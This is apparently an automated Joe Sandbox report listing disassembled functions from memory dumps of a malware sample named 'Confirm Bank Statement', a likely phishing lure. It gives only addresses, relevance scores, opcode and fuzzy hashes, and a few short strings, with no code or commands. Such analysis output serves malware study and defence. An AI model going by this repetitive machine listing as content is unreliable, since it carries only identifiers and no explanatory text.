                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q
                                                                                              • API String ID: 0-2414175341
                                                                                              • Opcode ID: fd7b7f23f714c215e2625ab35e0b275f9f26cb3ac49e4f5e7c3b1e48f480d652
                                                                                              • Instruction ID: e19ac61a601db804d50aae6b3108f2b12c191b8eb329053c3a7aab1e8c48c406
                                                                                              • Opcode Fuzzy Hash: fd7b7f23f714c215e2625ab35e0b275f9f26cb3ac49e4f5e7c3b1e48f480d652
                                                                                              • Instruction Fuzzy Hash: 8391DD71E01208DFDB18DFA5E848AEEBBF6FF89300F14846AE456A7350DB749805CB91
                                                                                              Function 055BEBF0 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: f4c179b6ce5342db279caf4bf34d0ccbc44bac1d3c3ab134b4aac6941f70b01f
                                                                                              • Instruction ID: 6ed4f215ac9e7d797adc17133f6b3cd306b30fa451bb405c346a5e4c5b42939e
                                                                                              • Opcode Fuzzy Hash: f4c179b6ce5342db279caf4bf34d0ccbc44bac1d3c3ab134b4aac6941f70b01f
                                                                                              • Instruction Fuzzy Hash: 62D10D3590020ACFDF05DFA8D8989EDF7B5FF48314B148A59D8166B259DB70AA89CFC0
                                                                                              Function 055BEBA2 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 480fc167d664e9c440526436778dd3de0bd8687ba088a722ac6e6762dd341030
                                                                                              • Instruction ID: 4ca6815113b501988523c50db33af7a8654b3a27aaea4b05b2a8c2e8c5146e7d
                                                                                              • Opcode Fuzzy Hash: 480fc167d664e9c440526436778dd3de0bd8687ba088a722ac6e6762dd341030
                                                                                              • Instruction Fuzzy Hash: 68B1203590024ACFCF05DFA8C8848D9F7B1FF48314B148A59D816AB259D770EA9ACF80
                                                                                              Function 072704C8 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q
                                                                                              • API String ID: 0-2414175341
                                                                                              • Opcode ID: b65d25427b3c071ccccd046a28d8a20af494385d0f36011bc3770d06ddde08e2
                                                                                              • Instruction ID: 32dbb4dfb50dd407cc570fa83652781edc0cbcc58857198ff8479ce1430d3367
                                                                                              • Opcode Fuzzy Hash: b65d25427b3c071ccccd046a28d8a20af494385d0f36011bc3770d06ddde08e2
                                                                                              • Instruction Fuzzy Hash: 5C71C3B1A103069FE734DB65D954BAEBBE6EFC4201F14882DE8069B290DF749C49CB51
                                                                                              Function 07275AC8 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8q
                                                                                              • API String ID: 0-4083045702
                                                                                              • Opcode ID: 424946adc0d8efd75fc7becadd76f68f3c40c382cf669c1b942d5ac8b6c77c16
                                                                                              • Instruction ID: 3a5b75e8a39fe136ccf20a39d715905355b3752727fe2fc7381c879811192128
                                                                                              • Opcode Fuzzy Hash: 424946adc0d8efd75fc7becadd76f68f3c40c382cf669c1b942d5ac8b6c77c16
                                                                                              • Instruction Fuzzy Hash: E03103B0E21209DBCB04CFAAE5846EEFBB6FF89310F109029E815A7354DB745951CF94
                                                                                              Function 07275AB9 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8q
                                                                                              • API String ID: 0-4083045702
                                                                                              • Opcode ID: 752ec770b9dce861f76783af4d2565c9c6cf902eb616b126d7cefc41b631571a
                                                                                              • Instruction ID: 3f2be296cdc580fd2f1ada18d53142e24981f93b2562cba65fcf260e37257a4a
                                                                                              • Opcode Fuzzy Hash: 752ec770b9dce861f76783af4d2565c9c6cf902eb616b126d7cefc41b631571a
                                                                                              • Instruction Fuzzy Hash: 7F3132B0E25209DFCB04CFAAE6846EEFBB2FB89300F10906AE815A7254D7B45951CF54
                                                                                              Function 0727979F Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq
                                                                                              • API String ID: 0-1098410595
                                                                                              • Opcode ID: 2a48fbc90393e6bb39f8479dc6dc3358532e1fa06f02c3b47510a852b870b9fb
                                                                                              • Instruction ID: 5f65896c263f48696aa3a2f8e0ecd125a2f4ca82ed9fd197cbefed439e1dc6da
                                                                                              • Opcode Fuzzy Hash: 2a48fbc90393e6bb39f8479dc6dc3358532e1fa06f02c3b47510a852b870b9fb
                                                                                              • Instruction Fuzzy Hash: 9F21BFB4E10219CFDB08CFE9C9809EDBBB2FB8D314F20812AD919AB355C7356946CB50
                                                                                              Function 055BEF90 Relevance: .7, Instructions: 730COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64ada2e49718bc2542061a1c662578fd96b1a9b7a709874516350c4c32fbeac2
                                                                                              • Instruction ID: 8f052ad426f32f0980389d00e5b710122ae82abf62c69e5763ecb84718fa2102
                                                                                              • Opcode Fuzzy Hash: 64ada2e49718bc2542061a1c662578fd96b1a9b7a709874516350c4c32fbeac2
                                                                                              • Instruction Fuzzy Hash: E7723E31D10609CFDB15EF68D858AEDB7B1FF45311F008699D54AAB265EF30AAC9CB80
                                                                                              Function 055BBF48 Relevance: .6, Instructions: 551COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 547df17b05d3f6f4b039e388db28b3afa9a9596ca3c3f44d8789c38702c77dbe
                                                                                              • Instruction ID: 67af7958c94112621ab6247c3668ac6a7e6f881e6f57849236c798ff12a556cd
                                                                                              • Opcode Fuzzy Hash: 547df17b05d3f6f4b039e388db28b3afa9a9596ca3c3f44d8789c38702c77dbe
                                                                                              • Instruction Fuzzy Hash: 7042D931E1061ACBDB15DFA8C8986EDF7B1BF89310F108699D459BB251EB70AE85CF40
                                                                                              Function 072707C0 Relevance: .5, Instructions: 498COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6495850efa10a10e38b81fa267e259b02492b5a5977394e5d8b46ddb097f938
                                                                                              • Instruction ID: b7043ca31e73befdc018543e3b0fa6384a40273548e2d5c7a8b05fac66a14def
                                                                                              • Opcode Fuzzy Hash: a6495850efa10a10e38b81fa267e259b02492b5a5977394e5d8b46ddb097f938
                                                                                              • Instruction Fuzzy Hash: 88E116B0F21206CFCB25AF64C6486AEBFF1EF85200F5544AAD046E72A5E731CD59CB91
                                                                                              Function 07272F30 Relevance: .3, Instructions: 332COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 268e65684f25ad279ebb7d4968f8351cf8785af4552a990ff37fc1c33ff3c3d1
                                                                                              • Instruction ID: 13dde740de283d96439ca18b28a96095472e32a277cdb7810757496199bbd8d5
                                                                                              • Opcode Fuzzy Hash: 268e65684f25ad279ebb7d4968f8351cf8785af4552a990ff37fc1c33ff3c3d1
                                                                                              • Instruction Fuzzy Hash: FAF1DB71D1061ACBCF10DFA8C9549EDB7B5FF49300F1086AAD449B7215EB70AA85CF90
                                                                                              Function 055BBF3A Relevance: .3, Instructions: 331COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13479dd314948e8ffeeea0b1f7ae5cdff3ce0b32ad65400666eea9a9998c229a
                                                                                              • Instruction ID: 517c911c0e0e52d6ab106134e8d9c6e01f2e97dea3bb69ea8878f658ce062cf4
                                                                                              • Opcode Fuzzy Hash: 13479dd314948e8ffeeea0b1f7ae5cdff3ce0b32ad65400666eea9a9998c229a
                                                                                              • Instruction Fuzzy Hash: 79E1EE31E0061A8FDF14DFA8C8986EDB7B1BF49310F118699D459BB251DBB0AD85CF44
                                                                                              Function 07272F20 Relevance: .3, Instructions: 324COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c30c2212ae493fae1cdb5b07adcfb90b62e2f0708e45f0429571c0fb439966e5
                                                                                              • Instruction ID: 3cadddd71323c17fcce96caae6cf6d71fa6344b050109509bbbcbec534f2dee9
                                                                                              • Opcode Fuzzy Hash: c30c2212ae493fae1cdb5b07adcfb90b62e2f0708e45f0429571c0fb439966e5
                                                                                              • Instruction Fuzzy Hash: 51E1EA71E1061ACBCF10DFA8C9549EDB7B5FF49300F1186AAD449B7255EB30AA89CF90
                                                                                              Function 07273540 Relevance: .3, Instructions: 301COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c80ac9342066bbb5be22840fb961ca6aaadce17537030eabccb7c2151fd01adc
                                                                                              • Instruction ID: ac11e5103a60904c3e8d0dc66c63c6fef67b55f223df21bc335a131697d2b7ec
                                                                                              • Opcode Fuzzy Hash: c80ac9342066bbb5be22840fb961ca6aaadce17537030eabccb7c2151fd01adc
                                                                                              • Instruction Fuzzy Hash: F6C15DB1F2025A8FCB14DF68C9446EDB7B2BF85300F1485A9D406BB351EB70AD89CB91
                                                                                              Function 072743B0 Relevance: .2, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f24fbdfe46e50b1b12f3f1971a610fac92d3d848bac852bdc9dcac3a5e6ac85
                                                                                              • Instruction ID: c3d70cf08bd13bcf8281a35242dedfcfd40496a967062ea350cc9f414cdf22ab
                                                                                              • Opcode Fuzzy Hash: 9f24fbdfe46e50b1b12f3f1971a610fac92d3d848bac852bdc9dcac3a5e6ac85
                                                                                              • Instruction Fuzzy Hash: 289147B4D21249CBCB04EFA8E596AEDBBB5FF4A300F108569D805B7360DB389945CF91
                                                                                              Function 072743C0 Relevance: .2, Instructions: 223COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ac74490f926831c07312135807e67fd436f16f092170b65ae2ba91ceed9ce03
                                                                                              • Instruction ID: 5ac6723b4b8f69a0d465955e4aec41e027d2d799b81a588167eeb9066ce55265
                                                                                              • Opcode Fuzzy Hash: 2ac74490f926831c07312135807e67fd436f16f092170b65ae2ba91ceed9ce03
                                                                                              • Instruction Fuzzy Hash: 079148B4E21249CBCB04EFA8E596AEDBBB9FF4A300F108569D805B7350DB349945CF91
                                                                                              Function 07275D31 Relevance: .2, Instructions: 202COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f34ba1a95a40a9fa69c6b1417718988c42f901b35c9010f400c32d2c78bee95d
                                                                                              • Instruction ID: 147cbd96ef25c79d7b4b5cafcaf3a27ebbc99f70beb738ce26891428410c9b2e
                                                                                              • Opcode Fuzzy Hash: f34ba1a95a40a9fa69c6b1417718988c42f901b35c9010f400c32d2c78bee95d
                                                                                              • Instruction Fuzzy Hash: 9C91E4B0D2561ACFDB14CFA6C9887EDFBB2BF49300F108069E419A7261DBB45995CF41
                                                                                              Function 07276411 Relevance: .2, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aed9266f24e97d176086766dd08a3604d5170a22cfcae14328b702b298b29f3b
                                                                                              • Instruction ID: ebccbeb672b18690c028027f4a81e81c910508e86ce711fd7fee4c30fef75ba3
                                                                                              • Opcode Fuzzy Hash: aed9266f24e97d176086766dd08a3604d5170a22cfcae14328b702b298b29f3b
                                                                                              • Instruction Fuzzy Hash: CD81FEB0D2562DCFDB24CFA5CA45BEDBBB5BB0A304F1090A9D109B7241DBB41A85CF01
                                                                                              Function 055BE920 Relevance: .2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 230a2022b5d5bcae5a3dde20371215991f076e3608649978286ff1e74957f169
                                                                                              • Instruction ID: 5fed6e3607473ba1c95feb94c2746232dcc4865d93097c2ec06f7cba19d21e20
                                                                                              • Opcode Fuzzy Hash: 230a2022b5d5bcae5a3dde20371215991f076e3608649978286ff1e74957f169
                                                                                              • Instruction Fuzzy Hash: 3291E87190060ADFCB01DF68C8849D9FBF5FF49310B14879AE819AB255EB70E985CB80
                                                                                              Function 055BDC98 Relevance: .2, Instructions: 186COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc8eb73896c54ae2f036682f5941ed134b47d8a8246720ddeb10bb644ef56538
                                                                                              • Instruction ID: 4b524497d8b79a75fd63e780047a67f5535bfd8f8bb4a28a0294645cb8c36684
                                                                                              • Opcode Fuzzy Hash: bc8eb73896c54ae2f036682f5941ed134b47d8a8246720ddeb10bb644ef56538
                                                                                              • Instruction Fuzzy Hash: E68110B5200A408FC718DF29C488A99BBF2FF8931471589A9E54ACB372DB75EC41CF50
                                                                                              Function 055BE912 Relevance: .2, Instructions: 181COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f296c6b70843c62a7314394877357830f19d55e0f40251e0ab10251885df87f8
                                                                                              • Instruction ID: 20ced4a2abd8f3362b56583e2272d5e701360f0240497471ec105e6451c1fa99
                                                                                              • Opcode Fuzzy Hash: f296c6b70843c62a7314394877357830f19d55e0f40251e0ab10251885df87f8
                                                                                              • Instruction Fuzzy Hash: 71715971D0061ACFCB11DF68C884AD9FBB5FF49310B14879AE859AB255EB70E985CB80
                                                                                              Function 0727643D Relevance: .2, Instructions: 179COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15a664767162439e311e06389902f54f0a8a3242377cd1229aff76bcd7b1a17e
                                                                                              • Instruction ID: 115366bca808a9206ee9e44303da73ca207dff2cef6e59fa6b1346d75ab849c3
                                                                                              • Opcode Fuzzy Hash: 15a664767162439e311e06389902f54f0a8a3242377cd1229aff76bcd7b1a17e
                                                                                              • Instruction Fuzzy Hash: 3071DDB0D2562DCFDB24CFA5CA557EDBBB5BB0A304F5090A9D109B7241DBB41A85CF01
                                                                                              Function 055BDCA8 Relevance: .2, Instructions: 176COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e06a8af8bb694d214eb9fa921785bf6c95a78f0a8990862e1ad7dd378f27141
                                                                                              • Instruction ID: b175bef9445b41ad3068e6a9bf5c1e2bb991e0d5d8cccd3c3fcdbccf40061c75
                                                                                              • Opcode Fuzzy Hash: 7e06a8af8bb694d214eb9fa921785bf6c95a78f0a8990862e1ad7dd378f27141
                                                                                              • Instruction Fuzzy Hash: 8871BDB9700A01CFC758DF29C488A59BBF2BF8931471589A9E54ACB372DB72EC45CB50
                                                                                              Function 055BDAB8 Relevance: .2, Instructions: 172COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3922a32d4811e9a69519a40b315ebf9076d146cbe26706fdc8ff075b9cab4625
                                                                                              • Instruction ID: cd1c3e0274f15a19f7393a239432baf0f1600ef4efa9265adf2c3b0775c73d97
                                                                                              • Opcode Fuzzy Hash: 3922a32d4811e9a69519a40b315ebf9076d146cbe26706fdc8ff075b9cab4625
                                                                                              • Instruction Fuzzy Hash: B471A274A042068FDB44CF68D584A99FBF1FF48310B1986A9E84ADB322D774EC85CF90
                                                                                              Function 055B17D1 Relevance: .2, Instructions: 171COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c08213f27c1696eb510e3a9432841800af510220d6f189af70e94b668a4172bb
                                                                                              • Instruction ID: 5f887b5548b8be96894093d700d376503999f3337e6723f9c2cb4689e4a822d1
                                                                                              • Opcode Fuzzy Hash: c08213f27c1696eb510e3a9432841800af510220d6f189af70e94b668a4172bb
                                                                                              • Instruction Fuzzy Hash: A471B034A01649EFDB55DF69D898DAEBBB2BF48314F114099F901AB361C771E881CB50
                                                                                              Function 055B7F60 Relevance: .2, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f8a87571371f4ded76b627a7236021dc1935418edd2dba8a0fc567035529cc3
                                                                                              • Instruction ID: 2053805be9214aab94c5efeab19716a0b84c06fb532748ec0fc8956f41f4d1fa
                                                                                              • Opcode Fuzzy Hash: 5f8a87571371f4ded76b627a7236021dc1935418edd2dba8a0fc567035529cc3
                                                                                              • Instruction Fuzzy Hash: 47515F71E102099FDB14DFAAD848AEFBBFAFFC8210F10851AE415E3350DB7499058BA5
                                                                                              Function 055B2978 Relevance: .1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5c6cb81e4f3776413569bc4370fa072175a805e2c3c51c589be9574dd5e8e8ec
                                                                                              • Instruction ID: a8d05d784f4df137fd7f392300dd21a09582ee892b3ed80dc82a915fe69993ad
                                                                                              • Opcode Fuzzy Hash: 5c6cb81e4f3776413569bc4370fa072175a805e2c3c51c589be9574dd5e8e8ec
                                                                                              • Instruction Fuzzy Hash: D151D534A10619CFCB04DF68C898AADBBB5FF89704F1585A9E506AB371EB70ED45CB40
                                                                                              Function 055B30A8 Relevance: .1, Instructions: 147COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f34650a11c7a8e954ff9ff98d47ad2b12268ffa908e6b213a8f6e158b6fefbc6
                                                                                              • Instruction ID: b9a646133f7a10658093be03f600f694027ef1a3a8c547323135600f823ad2f5
                                                                                              • Opcode Fuzzy Hash: f34650a11c7a8e954ff9ff98d47ad2b12268ffa908e6b213a8f6e158b6fefbc6
                                                                                              • Instruction Fuzzy Hash: AE51C030A0470A8FCB18DF79D45459EBBB2FF89204714896DD40AAB351EF35A946CB91
                                                                                              Function 055B2988 Relevance: .1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edd9bb16e2c0b843c5be284ee2280d63e25fbd25459104115a53815bce221aae
                                                                                              • Instruction ID: cc63143f1f89a8c428bae8189137ae07eb12a7071b840337d35150e1fe2df580
                                                                                              • Opcode Fuzzy Hash: edd9bb16e2c0b843c5be284ee2280d63e25fbd25459104115a53815bce221aae
                                                                                              • Instruction Fuzzy Hash: 8551E534A10609CFCB04EF68C8989ADBBB5FF89700F1585A9E506AB371EB70ED45CB40
                                                                                              Function 07274F60 Relevance: .1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f7073366c8f338c17d8f819e21f45f82d68d424e7a117046921d1cc7bb828a3
                                                                                              • Instruction ID: 519b5fafa8b4c155c2bfe491c10be88c81763c952a4b6deb9065ff6a6f6435d3
                                                                                              • Opcode Fuzzy Hash: 3f7073366c8f338c17d8f819e21f45f82d68d424e7a117046921d1cc7bb828a3
